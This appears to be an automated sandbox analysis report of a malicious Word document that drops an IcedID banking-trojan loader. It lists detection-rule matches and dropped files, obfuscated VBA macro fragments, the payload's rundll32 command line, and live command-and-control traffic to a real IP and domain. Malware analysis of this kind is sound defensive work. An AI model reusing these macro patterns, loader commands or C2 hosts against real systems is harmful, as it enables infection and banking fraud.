      Source: global trafficHTTP traffic detected: GET /fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:5038:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:30423335313032443133344136373743; __io=0; _gid=67AFEDC5AC03Host: alexbionka.com

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
      Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

      System Summary

      barindex
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: Screenshot number: 4Screenshot OCR: Enable editing" button on I W a the top bar, and then cIick"Enable content". . 0 e ="F- "" m
      Source: Screenshot number: 4Screenshot OCR: Enable content". . 0 e ="F- "" m " " "" " "" " 8==",== " ii; It ' 4#1,1 0 Pa,e, I of
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDropped file: MD5: 51138beea3e2c21ec44d0932c71762a8 Family: APT29 Alias: Cozy Bear, Cozy Duke, The Dukes, Dukes, Group 100, CozyDuke, EuroAPT, CozyBear, CozyCar, Cozer, Office Monkeys, OfficeMonkeys, Minidionis, SeaDuke, Hammer Toss, APT29 Description: APT29 has operated since at least 2008 and attributed to the Russian government in public reports. It is regarded as a well-resourced, highly dedicated, and organized cyber-espionage group to collect intelligence in support of foreign and security policy decision-making. References: https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdfhttps://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdfhttps://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdfhttps://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.htmlData Source: https://github.com/RedDrip7/APT_Digital_Weapon
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dllJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dllJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeJump to dropped file
      Source: dodsonimaging,file,08.11.2022.docOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
      Source: dodsonimaging,file,08.11.2022.docOLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("EGbu4DYv1ISu"), VbGet, )
      Source: dodsonimaging,file,08.11.2022.docOLE, VBA macro line: Set = CallByName((laMT7W1FQ9("u2vxtRyF")), laMT7W1FQ9("bsAPpUjyw"), VbGet, laMT7W1FQ9("Hba7JAe"))
      Source: dodsonimaging,file,08.11.2022.docOLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("URvEhK0Z"), VbGet, )
      Source: ~DF4786325F45128C5F.TMP.0.drOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
      Source: ~DF4786325F45128C5F.TMP.0.drOLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("EGbu4DYv1ISu"), VbGet, )
      Source: ~DF4786325F45128C5F.TMP.0.drOLE, VBA macro line: Set = CallByName((laMT7W1FQ9("u2vxtRyF")), laMT7W1FQ9("bsAPpUjyw"), VbGet, laMT7W1FQ9("Hba7JAe"))
      Source: ~DF4786325F45128C5F.TMP.0.drOLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("URvEhK0Z"), VbGet, )
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
      Source: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
      Source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800024FC
      Source: dodsonimaging,file,08.11.2022.docOLE, VBA macro line: Private Sub Document_Open()
      Source: ~DF4786325F45128C5F.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_00041203 HeapSetInformation,NtSetInformationProcess,lstrlenW,LocalAlloc,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,LocalFree,ExitProcess,
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_00041A33 NtOpenProcessToken,NtClose,
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_00041A8C NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_000419E3 NtOpenProcessToken,NtSetInformationToken,NtClose,
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D5FE6 NtCreateSection,NtMapViewOfSection,
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D5FF9 NtCreateSection,
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
      Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: ~DF4786325F45128C5F.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.drStatic PE information: No import functions for PE file found
      Source: y84FE.tmp.dll.0.drStatic PE information: No import functions for PE file found
      Source: r8F8A.tmp.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: r8F8A.tmp.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: r8F8A.tmp.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dodsonimaging,file,08.11.2022.docOLE indicator, VBA macros: true
      Source: ~DF4786325F45128C5F.TMP.0.drOLE indicator, VBA macros: true
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe 5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeMemory allocated: 77620000 page execute and read and write
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeMemory allocated: 77740000 page execute and read and write
      Source: dodsonimaging,file,08.11.2022.docVirustotal: Detection: 26%
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
      Source: dodsonimaging,file,08.11.2022.LNK.0.drLNK file: ..\..\..\..\..\Desktop\dodsonimaging,file,08.11.2022.doc
      Source: dodsonimaging,file,08.11.2022.docOLE indicator, Word Document stream: true
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$dsonimaging,file,08.11.2022.docJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6B5F.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@5/14@2/2
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_000414BD LoadLibraryExW,RtlImageNtHeader,SetProcessDEPPolicy,GetLastError,FormatMessageW,
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCommand line argument: RunDLL
      Source: dodsonimaging,file,08.11.2022.docOLE document summary: title field not present or empty
      Source: dodsonimaging,file,08.11.2022.docOLE document summary: author field not present or empty
      Source: dodsonimaging,file,08.11.2022.docOLE document summary: edited time not present or 0
      Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.drOLE document summary: edited time not present or 0
      Source: ~DF4786325F45128C5F.TMP.0.drOLE document summary: title field not present or empty
      Source: ~DF4786325F45128C5F.TMP.0.drOLE document summary: author field not present or empty
      Source: ~DF4786325F45128C5F.TMP.0.drOLE document summary: edited time not present or 0
      Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: dodsonimaging,file,08.11.2022.docInitial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: dodsonimaging,file,08.11.2022.docStatic file information: File size 2298458 > 1048576
      Source: Binary string: rundll32.pdb source: r8F8A.tmp.exe, r8F8A.tmp.exe, 00000004.00000000.924645726.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe, 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe.0.dr
      Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.drInitial sample: OLE indicators vbamacros = False
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_000419CA push ecx; ret
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D8BC2 push rax; ret
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D610E push rdx; ret
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
      Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.drStatic PE information: real checksum: 0x59d91 should be: 0x5f194
      Source: y84FE.tmp.dll.0.drStatic PE information: real checksum: 0x59d91 should be: 0x5f194
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dllJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dllJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
